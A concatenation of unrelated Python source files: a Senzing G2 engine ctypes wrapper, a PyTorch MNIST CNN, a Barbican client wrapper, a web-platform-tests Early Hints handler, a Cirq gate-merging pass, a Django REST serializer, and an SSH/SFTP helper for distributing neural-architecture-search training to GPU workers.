str: JSON document with results
"""
_excludedEntities = self.prepareStringArgument(excludedEntities)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathExcludingByEntityID.restype = c_int
self._lib_handle.G2_findPathExcludingByEntityID.argtypes = [c_longlong, c_longlong, c_int, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathExcludingByEntityID(startEntityID,endEntityID,maxDegree,_excludedEntities,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return tls_var.buf.value.decode('utf-8')
def findPathIncludingSourceByEntityID(self,startEntityID,endEntityID,maxDegree,excludedEntities,requiredDsrcs,flags):
        # type: (int,int,int,str,str,int) -> str
""" Find a path between two entities in the system.
Args:
startEntityID: The entity ID you want to find the path from
endEntityID: The entity ID you want to find the path to
maxDegree: The maximum path length to search for
excludedEntities: JSON document containing entities to exclude
requiredDsrcs: JSON document containing data sources to require
flags: control flags
Return:
str: JSON document with results
"""
_excludedEntities = self.prepareStringArgument(excludedEntities)
_requiredDsrcs = self.prepareStringArgument(requiredDsrcs)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathIncludingSourceByEntityID.restype = c_int
self._lib_handle.G2_findPathIncludingSourceByEntityID.argtypes = [c_longlong, c_longlong, c_int, c_char_p, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathIncludingSourceByEntityID(startEntityID,endEntityID,maxDegree,_excludedEntities,_requiredDsrcs,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return tls_var.buf.value.decode('utf-8')
def findPathExcludingByRecordID(self,startDsrcCode,startRecordId,endDsrcCode,endRecordId,maxDegree,excludedEntities,flags):
        # type: (str,str,str,str,int,str,int) -> str
""" Find a path between two records in the system.
Args:
startDataSourceCode: The data source for the record you want to find the path from
startRecordID: The ID for the record you want to find the path from
endDataSourceCode: The data source for the record you want to find the path to
endRecordID: The ID for the record you want to find the path to
maxDegree: The maximum path length to search for
excludedEntities: JSON document containing entities to exclude
flags: control flags
Return:
str: JSON document with results
"""
_startDsrcCode = self.prepareStringArgument(startDsrcCode)
_startRecordId = self.prepareStringArgument(startRecordId)
_endDsrcCode = self.prepareStringArgument(endDsrcCode)
_endRecordId = self.prepareStringArgument(endRecordId)
_excludedEntities = self.prepareStringArgument(excludedEntities)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathExcludingByRecordID.restype = c_int
self._lib_handle.G2_findPathExcludingByRecordID.argtypes = [c_char_p, c_char_p, c_char_p, c_char_p, c_int, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathExcludingByRecordID(_startDsrcCode,_startRecordId,_endDsrcCode,_endRecordId,maxDegree,
_excludedEntities,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def findPathIncludingSourceByRecordID(self,startDsrcCode,startRecordId,endDsrcCode,endRecordId,maxDegree,excludedEntities,requiredDsrcs,flags):
        # type: (str,str,str,str,int,str,str,int) -> str
""" Find a path between two records in the system.
Args:
startDataSourceCode: The data source for the record you want to find the path from
startRecordID: The ID for the record you want to find the path from
endDataSourceCode: The data source for the record you want to find the path to
endRecordID: The ID for the record you want to find the path to
maxDegree: The maximum path length to search for
excludedEntities: JSON document containing entities to exclude
requiredDsrcs: JSON document containing data sources to require
flags: control flags
Return:
str: JSON document with results
"""
_startDsrcCode = self.prepareStringArgument(startDsrcCode)
_startRecordId = self.prepareStringArgument(startRecordId)
_endDsrcCode = self.prepareStringArgument(endDsrcCode)
_endRecordId = self.prepareStringArgument(endRecordId)
_excludedEntities = self.prepareStringArgument(excludedEntities)
_requiredDsrcs = self.prepareStringArgument(requiredDsrcs)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathIncludingSourceByRecordID.restype = c_int
self._lib_handle.G2_findPathIncludingSourceByRecordID.argtypes = [c_char_p, c_char_p, c_char_p, c_char_p, c_int, c_char_p, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathIncludingSourceByRecordID(_startDsrcCode,_startRecordId,_endDsrcCode,_endRecordId,maxDegree,
_excludedEntities,_requiredDsrcs,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def getEntityByEntityID(self,entityID):
# type: (int) -> str
""" Find the entity with the given ID
Args:
entityID: The entity ID you want returned. Typically referred to as
ENTITY_ID in JSON results.
Return:
str: JSON document with results
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getEntityByEntityID.argtypes = [c_longlong, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getEntityByEntityID(entityID,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return tls_var.buf.value.decode('utf-8')
def getEntityByEntityIDV2(self,entityID,flags):
        # type: (int,int) -> str
""" Find the entity with the given ID
Args:
entityID: The entity ID you want returned. Typically referred to as
ENTITY_ID in JSON results.
flags: control flags.
Return:
str: JSON document with results
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getEntityByEntityID_V2.restype = c_int
self._lib_handle.G2_getEntityByEntityID_V2.argtypes = [c_longlong, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getEntityByEntityID_V2(entityID,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return tls_var.buf.value.decode('utf-8')
def getEntityByRecordID(self,dsrcCode,recordId):
# type: (str,str) -> str
""" Get the entity containing the specified record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
Return:
str: JSON document with results
"""
_dsrcCode = self.prepareStringArgument(dsrcCode)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getEntityByRecordID.argtypes = [c_char_p, c_char_p, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getEntityByRecordID(_dsrcCode,_recordId,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def getEntityByRecordIDV2(self,dsrcCode,recordId,flags):
        # type: (str,str,int) -> str
""" Get the entity containing the specified record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
flags: control flags.
Return:
str: JSON document with results
"""
_dsrcCode = self.prepareStringArgument(dsrcCode)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getEntityByRecordID_V2.restype = c_int
self._lib_handle.G2_getEntityByRecordID_V2.argtypes = [c_char_p, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getEntityByRecordID_V2(_dsrcCode,_recordId,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def getRecord(self,dsrcCode,recordId):
# type: (str,str) -> str
""" Get the specified record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
Return:
str: JSON document with results
"""
_dsrcCode = self.prepareStringArgument(dsrcCode)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getRecord.argtypes = [c_char_p, c_char_p, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getRecord(_dsrcCode,_recordId,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def getRecordV2(self,dsrcCode,recordId,flags):
        # type: (str,str,int) -> str
""" Get the specified record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
flags: control flags.
Return:
str: JSON document with results
"""
_dsrcCode = self.prepareStringArgument(dsrcCode)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getRecord_V2.restype = c_int
self._lib_handle.G2_getRecord_V2.argtypes = [c_char_p, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getRecord_V2(_dsrcCode,_recordId,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def stats(self):
# type: () -> object
""" Retrieve the workload statistics for the current process.
        Resets them after they are retrieved.
Args:
Return:
object: JSON document with statistics
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_stats.argtypes = [POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_stats(pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def exportConfig(self):
# type: () -> object
""" Retrieve the G2 engine configuration
Args:
Return:
object: JSON document with G2 engine configuration
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_exportConfig.argtypes = [POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_exportConfig(pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return responseBuf.value.decode('utf-8')
def getActiveConfigID(self):
# type: () -> object
""" Retrieve the active config ID for the G2 engine
Args:
Return:
object: The numeric active config ID
"""
configID = c_longlong(0)
self._lib_handle.G2_getActiveConfigID.argtypes = [POINTER(c_longlong)]
ret_code = self._lib_handle.G2_getActiveConfigID(configID)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return configID.value
def getRepositoryLastModifiedTime(self):
# type: () -> object
""" Retrieve the last modified time stamp of the entity store repository
Args:
Return:
object: The last modified time stamp, as a numeric integer
"""
lastModifiedTimeStamp = c_longlong(0)
self._lib_handle.G2_getRepositoryLastModifiedTime.argtypes = [POINTER(c_longlong)]
ret_code = self._lib_handle.G2_getRepositoryLastModifiedTime(lastModifiedTimeStamp)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return lastModifiedTimeStamp.value
def purgeRepository(self, reset_resolver_=True):
# type: (bool) -> None
""" Purges the G2 repository
Args:
reset_resolver: Re-initializes the engine. Should be left True.
Return:
None
"""
resize_return_buffer(None, 65535)
retval = self._lib_handle.G2_purgeRepository()
if retval == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif retval == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
        if reset_resolver_:
self.restart()
def restart(self):
""" Internal function """
self.destroy()
self.init()
def destroy(self):
""" Uninitializes the engine
This should be done once per process after init(...) is called.
After it is called the engine will no longer function.
Args:
Return:
None
"""
self._lib_handle.G2_destroy()
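# Usage sketch (illustrative only): assumes `engine` is an initialized
# instance of this class; the data source codes and IDs are hypothetical.
#
#   path_json = engine.findPathByRecordID('CUSTOMERS', '1001',
#                                         'CUSTOMERS', '1002', 4)
#   entity_json = engine.getEntityByEntityID(1)
#   engine.destroy()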
|
python
|
import torch.nn as nn
import torch.nn.functional as F
class CNN(nn.Module):
# https://github.com/rensutheart/PyTorch-Deep-Learning-Tutorials/blob/master/part3_MNIST.py
def __init__(self, n_classes):
super(CNN, self).__init__()
# define all the components that will be used in the NN (these can be reused)
        self.conv1 = nn.Conv2d(1, 10, kernel_size=5, padding=2)   # 1 input channel, 10 output channels
        self.conv2 = nn.Conv2d(10, 20, kernel_size=5, padding=2)  # 10 input channels, 20 output channels
self.mp = nn.MaxPool2d(2)
self.drop2D = nn.Dropout2d(p=0.25)
        self.fc1 = nn.Linear(980, 90)  # 20 channels * 7 * 7 after two conv+pool stages on a 28x28 input
self.fc2 = nn.Linear(90, n_classes)
def forward(self, x):
        # define the actual network
in_size = x.size(0) # this is the batch size
# you can chain function together to form the layers
x = F.relu(self.mp(self.conv1(x)))
x = F.relu(self.mp(self.conv2(x)))
# x = self.drop2D(x)
        x = x.view(in_size, -1) # flatten data; -1 is inferred from the other dimensions (20*7*7 = 980 for 28x28 inputs)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return F.log_softmax(x, dim=1)
def num_flat_features(self, x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
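if __name__ == '__main__':
    # Sanity check (sketch): push a dummy MNIST-sized batch through the model;
    # assumes 1x28x28 inputs, which is what the fc1 size above is derived from.
    import torch
    model = CNN(n_classes=10)
    out = model(torch.randn(4, 1, 28, 28))
    print(out.shape)  # torch.Size([4, 10])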
|
python
|
# Copyright 2014 - Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from barbicanclient import client as barbicanclient
from barbicanclient.common import auth as barbicanauth
from oslo.config import cfg
from solum.openstack.common import importutils
class BarbicanClient(object):
"""Barbican client wrapper so we can encapsulate logic in one place."""
def __init__(self, insecure=False):
self.insecure = insecure
self._admin_client = None
@property
def admin_client(self):
if not self._admin_client:
# Create connection to API
self._admin_client = self._barbican_admin_init()
return self._admin_client
def _barbican_admin_init(self):
# Import auth_token to have keystone_authtoken settings setup.
importutils.import_module('keystoneclient.middleware.auth_token')
keystone = barbicanauth.KeystoneAuthV2(
auth_url=cfg.CONF.keystone_authtoken.auth_uri,
username=cfg.CONF.keystone_authtoken.admin_user,
password=cfg.CONF.keystone_authtoken.admin_password,
tenant_name=cfg.CONF.keystone_authtoken.admin_tenant_name)
return barbicanclient.Client(auth_plugin=keystone,
insecure=self.insecure)
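# Usage sketch (illustrative): the admin client is built lazily on first
# property access, authenticating to Barbican via Keystone v2.
#
#   client = BarbicanClient(insecure=False)
#   barbican = client.admin_client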
|
python
|
from .R2 import R2
|
python
|
import os
def handle_headers(frame, request, response):
# Send a 103 response.
resource_url = request.GET.first(b"resource-url").decode()
link_header_value = "<{}>; rel=preload; as=script".format(resource_url)
early_hints = [
(b":status", b"103"),
(b"link", link_header_value),
]
early_hints_policy = request.GET.first(b"early-hints-policy").decode()
    # In this test handler only "allowed" and "absent" are valid policies because
    # csp-document-disallow.html always sets CSP to disallow the preload.
# "disallowed" makes no observable changes in the test. Note that
# csp-basic.html covers disallowing preloads in Early Hints.
assert early_hints_policy == "allowed" or early_hints_policy == "absent"
if early_hints_policy == "allowed":
resource_origin = request.GET.first(b"resource-origin").decode()
csp_value = "script-src 'self' 'unsafe-inline' {}".format(resource_origin)
early_hints.append((b"content-security-policy", csp_value))
response.writer.write_raw_header_frame(headers=early_hints,
end_headers=True)
# Send the final response header.
response.status = 200
response.headers["content-type"] = "text/html"
response.write_status_headers()
def main(request, response):
current_dir = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(current_dir, "csp-document-disallow.html")
with open(file_path, "r") as f:
test_content = f.read()
response.writer.write_data(item=test_content, last=True)
|
python
|
# Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An optimization pass that combines adjacent single-qubit rotations."""
from typing import Iterable, List, Tuple, cast, Optional
import numpy as np
from cirq import ops, extension
from cirq.circuits.circuit import Circuit
from cirq.circuits.optimization_pass import (
PointOptimizationSummary,
PointOptimizer,
)
class MergeSingleQubitGates(PointOptimizer):
"""Combines adjacent constant single-qubit rotations into
SingleQubitMatrixGates.
"""
def __init__(self,
extensions: extension.Extensions = None) -> None:
super().__init__()
self.extensions = extensions or extension.Extensions()
def optimization_at(self,
circuit: Circuit,
index: int,
op: ops.Operation
) -> Optional[PointOptimizationSummary]:
if len(op.qubits) != 1:
return None
indices, gates = self._scan_single_qubit_ops(circuit, index,
op.qubits[0])
if not gates:
return None
        # Merge the scanned gates into a single matrix gate.
operations = self._merge_rotations(op.qubits[0], gates)
return PointOptimizationSummary(
clear_span=max(indices) + 1 - index,
clear_qubits=op.qubits,
new_operations=operations)
def _scan_single_qubit_ops(self,
circuit: Circuit,
index: Optional[int],
qubit: ops.QubitId
) -> Tuple[List[int], List[ops.KnownMatrix]]:
operations = [] # type: List[ops.KnownMatrix]
indices = [] # type: List[int]
while index is not None:
op = cast(ops.Operation, circuit.operation_at(qubit, index))
if len(op.qubits) != 1:
break
operation = self.extensions.try_cast(ops.KnownMatrix, op)
if operation is None:
break
indices.append(index)
operations.append(operation)
index = circuit.next_moment_operating_on([qubit], index + 1)
return indices, operations
def _merge_rotations(self,
qubit: ops.QubitId,
operations: Iterable[ops.KnownMatrix]
) -> List[ops.Operation]:
matrix = np.eye(2, dtype=np.complex128)
for op in operations:
matrix = np.dot(op.matrix(), matrix)
return [ops.SingleQubitMatrixGate(matrix)(qubit)]
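# Usage sketch (pre-1.0 cirq API, as used above; illustrative only):
#
#   MergeSingleQubitGates().optimize_circuit(circuit)
#
# Each run of adjacent single-qubit gates on a qubit collapses into one
# SingleQubitMatrixGate.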
|
python
|
from rest_framework import serializers
from .models import Product
class ProductSerializer(serializers.ModelSerializer):
# Get the image url by serializing `ImageField`
image = serializers.ImageField(max_length=None, allow_empty_file=False, allow_null=True, required=False)
class Meta:
# Model to be serialized
model = Product
# Fields to be serialized
fields = ("id", "name", "description", "price", "stock", "image", "category")
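# Usage sketch (assumes a saved Product instance named `product`):
#
#   serializer = ProductSerializer(product)
#   serializer.data  # dict with id, name, description, price, stock, image, category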
|
python
|
import os
import platform
import time
import sys
import importlib
import glob
import subprocess
import selectors
import multiprocess
import paramiko
from comm.platform import linux_win, run_cmd_list, run_cmd
from compute import Config_ini
from compute.log import Log
def get_local_path():
"""
    :return: the absolute path of the current working directory
"""
_path = os.getcwd()
return _path
def get_transfer_local_path():
"""
    :return: the absolute path of the project root (two levels above this file)
"""
_path = os.path.dirname(os.path.dirname(__file__))
return _path
def get_algo_name():
"""
    :return: the name of the currently running algorithm
"""
alg_name = Config_ini.alg_name
return alg_name
def get_gen_number():
"""
    :return: the maximum number of generations for the NAS iterations
"""
max_gen = Config_ini.max_gen
return int(max_gen)
def get_pop_siz():
"""
    :return: the population size
"""
pop_size = Config_ini.pop_size
return int(pop_size)
def get_exe_path():
exe_path = Config_ini.exe_path
return exe_path
def get_algo_local_dir():
"""
    :return: the runtime directory of the currently running algorithm
"""
top_dir = get_local_path()
alg_name = Config_ini.alg_name
local_dir = os.path.join(top_dir, 'runtime', alg_name)
if not os.path.exists(os.path.dirname(local_dir)):
os.mkdir(os.path.dirname(local_dir))
return local_dir
def get_population_dir():
"""
    :return: the populations directory under the algorithm's runtime directory, created if absent
"""
pop_dir = os.path.join(get_algo_local_dir(), 'populations')
if not os.path.exists(pop_dir):
os.makedirs(pop_dir)
return pop_dir
def get_top_dest_dir():
"""
    :return: the algorithm's path under the server root
"""
alg_name = Config_ini.alg_name
tdd = os.path.join('~', alg_name)
return tdd
def get_train_ini_path():
"""
    :return: the absolute path of train.ini
"""
return os.path.join(get_local_path(), 'train', 'train.ini')
def get_global_ini_path():
"""
    :return: the absolute path of global.ini
"""
return os.path.join(get_local_path(), 'global.ini')
def exec_cmd_remote(_cmd, need_response=True):
p = subprocess.Popen(_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout_str = None
stderr_str = None
if need_response:
sel = selectors.DefaultSelector()
sel.register(p.stdout, selectors.EVENT_READ)
sel.register(p.stderr, selectors.EVENT_READ)
stdout_ = None
stderr_ = None
for key, _ in sel.select():
data = key.fileobj.readlines()
if key.fileobj is p.stdout:
stdout_ = data
else:
stderr_ = data
if stdout_ is not None and len(stdout_) > 0:
stdout_str = ''.join([_.decode('utf-8') for _ in stdout_])
if stderr_ is not None and len(stderr_) > 0:
stderr_str = ''.join([_.decode('utf-8') for _ in stderr_])
return stdout_str, stderr_str
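# Usage sketch (illustrative): despite the name, this runs the command in a
# local subprocess and captures its output.
#
#   stdout_str, stderr_str = exec_cmd_remote('ls -l')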
def detect_file_exit(ssh_name, ssh_pwd, ip, port, file_name):
transport = paramiko.Transport((ip, port))
transport.connect(username=ssh_name, password=ssh_pwd)
sftp = paramiko.SFTPClient.from_transport(transport)
sftp.chdir('.')
try:
sftp.stat(file_name)
return True
except:
return False
def init_work_dir(ssh_name, ssh_password, ip, port):
Log.debug('Start to init the work directory in each worker')
alg_name = get_algo_name()
cmd_ = list()
if detect_file_exit(ssh_name, ssh_password, ip, port, alg_name):
system_ver = linux_win(ssh_name, ssh_password, ip, port)
time_str = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))
if system_ver == 'linux':
_bak_cmd = 'mv \'%s\' \'%s_bak_%s\'' % (alg_name, alg_name, time_str)
cmd_.append(_bak_cmd)
elif system_ver == 'windows':
_bak_cmd = 'ren %s %s_bak_%s' % (alg_name, alg_name, time_str)
cmd_.append(_bak_cmd)
else:
Log.debug('Current system %s is not windows or linux!' % ip)
_mk_cmd = 'mkdir %s' % alg_name
cmd_.append(_mk_cmd)
for cmd in cmd_:
Log.info('Execute the cmd: %s' % cmd)
stderr_ = run_cmd_list(ssh_name, ssh_password, ip, port, cmd_)
if stderr_:
Log.debug('Stderr: %s' % stderr_)
def init_work_dir_on_all_workers():
Log.info('Init the work directories on each worker')
gpu_info = Config_ini.gpu_info
ls_dataset = ['MNIST', 'CIFAR10', 'CIFAR100']
for sec in gpu_info.keys():
worker_name = gpu_info[sec]['worker_name']
worker_ip = gpu_info[sec]['worker_ip']
ssh_name = gpu_info[sec]['ssh_name']
ssh_password = gpu_info[sec]['ssh_password']
port = gpu_info[sec]['port']
init_work_dir(ssh_name, ssh_password, worker_ip, port)
transfer_training_files(ssh_name, ssh_password, worker_ip, port)
if Config_ini.dataset not in ls_dataset:
transfer_dataset_image(ssh_name, ssh_password, worker_ip, port, Config_ini.data_dir)
def makedirs(sftp, dir_path):
Log.info('Execute the operation: mkdir %s' % dir_path)
try:
sftp.stat(dir_path)
except:
sftp.mkdir(dir_path)
def exec_python(ssh_name, ssh_pwd, ip, port, py_file, args, python_exec):
top_dir = get_top_dest_dir()
py_file = os.path.join(top_dir, py_file).replace('~', '.').replace('\\', '/')
    # output goes to compute.log
Log.info('Execute the remote python file [(%s)%s]' % (ip, py_file))
_exec_cmd = '%s %s %s' % (python_exec, py_file,
' '.join([' '.join([k, v]) for k, v in
args.items()]))
Log.info('Execute the cmd: %s' % _exec_cmd)
p = multiprocess.Process(target=run_cmd, args=(ssh_name, ssh_pwd, ip, port, _exec_cmd))
p.start()
def transfer_file_relative(ssh_name, ssh_pwd, ip, port, source, dest):
"""Use relative path to transfer file, both source and dest are relative path
"""
top_dir = get_top_dest_dir()
full_path_dest = os.path.join(top_dir, dest).replace('~', '.')
full_path_dest = full_path_dest.replace('\\', '/')
full_path_source = os.path.join(get_local_path(), source).replace('\\', '/')
transport = paramiko.Transport((ip, port))
transport.connect(username=ssh_name, password=ssh_pwd)
sftp = paramiko.SFTPClient.from_transport(transport)
# full_path_source = full_path_source.replace(' ','\\\\ ')
makedirs(sftp, os.path.dirname(full_path_dest))
try:
Log.info('Execute the operation: put %s to %s' % (full_path_source, full_path_dest))
sftp.put(full_path_source, full_path_dest)
Log.info('Transfer file successfully...')
except Exception as e:
Log.info('Transfer file failed....')
Log.debug(e)
sftp.close()
def sftp_makedirs(sftp_sess, dir_path):
cwd_bak = sftp_sess.getcwd()
dir_split = [dir_path]
while os.path.dirname(dir_path) != '' and os.path.dirname(dir_path) != '/':
dir_split = [os.path.dirname(dir_path)] + dir_split
dir_path = dir_split[0]
for dir_ in dir_split:
try:
# exists
sftp_sess.stat(dir_)
except:
# absent
sftp_sess.mkdir(dir_)
sftp_sess.chdir(cwd_bak)
def sftp_transfer(sftp_sess, src_path, dst_path):
sftp_makedirs(sftp_sess, os.path.dirname(dst_path))
sftp_sess.put(src_path, dst_path)
def transfer_training_files(ssh_name, ssh_password, worker_ip, port):
training_file_dep = [(v, v) for _, v in get_training_file_dependences().items()]
transport = paramiko.Transport((worker_ip, port))
transport.connect(username=ssh_name, password=ssh_password)
sftp = paramiko.SFTPClient.from_transport(transport)
sftp.chdir('.')
root_dir = sftp.getcwd()
sub_file = os.path.dirname(os.path.dirname(__file__))
sub_file = os.path.join(sub_file, 'runtime/README.MD').replace('\\', '/')
training_file_dep = training_file_dep + [(sub_file, 'runtime/README.MD')]
top_dir = get_top_dest_dir()
for src, dst in training_file_dep:
full_path_source = os.path.join(get_transfer_local_path(), src)
full_path_dest = os.path.join(top_dir, dst).replace('~', root_dir).replace('\\', '/')
if full_path_dest.endswith('training.py'):
full_path_dest = os.path.join(os.path.dirname(os.path.dirname(full_path_dest)), 'training.py').replace('\\',
'/')
Log.debug('Start to sftp: `%s` ==> `%s`' % (full_path_source, full_path_dest))
sftp_transfer(sftp, full_path_source, full_path_dest)
transport.close()
def transfer_dataset_image(ssh_name, ssh_password, worker_ip, port, source):
transport = paramiko.Transport((worker_ip, port))
transport.connect(username=ssh_name, password=ssh_password)
sftp = paramiko.SFTPClient.from_transport(transport)
sftp.chdir('.')
root_dir = sftp.getcwd()
source = source.replace('\\', '/')
dset_name = source.split('/')[-1]
try:
sftp.stat(dset_name)
except:
sftp.mkdir(dset_name)
for root, subdir, files in os.walk(source):
for dir in subdir:
r_d = source.split("/")
local_subdir = os.path.join(root, dir).replace('\\', '/')
l_d = local_subdir.split("/")
r_m = l_d[len(r_d):]
r_m = "/".join(r_m)
